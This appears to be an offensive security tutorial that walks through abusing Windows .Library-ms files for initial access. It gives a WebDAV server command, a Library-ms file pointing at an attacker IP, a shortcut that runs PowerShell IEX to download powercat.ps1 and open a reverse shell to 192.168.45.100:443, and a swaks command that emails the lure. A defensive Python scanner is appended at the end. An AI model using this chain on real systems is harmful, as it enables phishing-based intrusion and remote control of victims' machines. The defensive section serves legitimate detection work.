Windows Library Files

Here we show how Windows Library files (.Library-ms) can be abused to get initial access.


Workflow

  • Set up a WebDAV service

  • Create Library file

  • Create shortcut

  • Attach Library File and send email

As listed above, we start by setting up a WebDAV server.

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root $(pwd)

Then we create a Library-ms file in VSCode with the content below.

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.45.179</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

Now we create a shortcut, which we will serve from the WebDAV service.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.100:8000/powercat.ps1');powercat -c 192.168.45.100 -p 443 -e powershell"

Finally, we send the Library-ms file using swaks.

swaks --to mailadmin@localhost --from test@localhost --header "Subject: Nice" --body @body.txt --attach @config.Library-ms --server <target-ip> --suppress-data

After the user clicks on the shortcut, we should get a reverse shell.
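Seen from the receiving side, the workflow above hinges on a .Library-ms attachment whose search connector points at a remote host, which a mail gateway or triage script can check for. The following is an added example, not part of the original page: the function names, the constructed samples and the knownfolder value used for the benign case are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}
# Locations that leave the machine: http(s) WebDAV URLs and UNC paths.
REMOTE = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)

def remote_locations(xml_text):
    """Return each <simpleLocation><url> value that points at a remote host."""
    # A library file has no need for a DTD; refuse one rather than
    # expanding entities that arrived in untrusted mail.
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        raise ValueError("unexpected DTD in library file")
    root = ET.fromstring(xml_text)
    urls = (u.text or "" for u in root.iterfind(".//lib:simpleLocation/lib:url", NS))
    return [u.strip() for u in urls if REMOTE.match(u.strip())]

def is_library_attachment(filename):
    """Match the extension case-insensitively, as Windows does."""
    return filename.lower().endswith(".library-ms")

def make_sample(url):
    # Constructed sample with the same element structure as the file shown above.
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>{url}</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed inputs: one remote location, one local known-folder location.
REMOTE_SAMPLE = make_sample("http://192.168.45.179")
LOCAL_SAMPLE = make_sample("knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}")

if __name__ == "__main__":
    attachments = [("config.Library-ms", REMOTE_SAMPLE),
                   ("Documents.library-ms", LOCAL_SAMPLE)]
    for name, body in attachments:
        if is_library_attachment(name):
            hits = remote_locations(body)
            print(name, "QUARANTINE" if hits else "ok", hits)
```

Library files that ship with Windows reference local known folders, so a remote location in a mailed .Library-ms file is a strong signal on its own.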
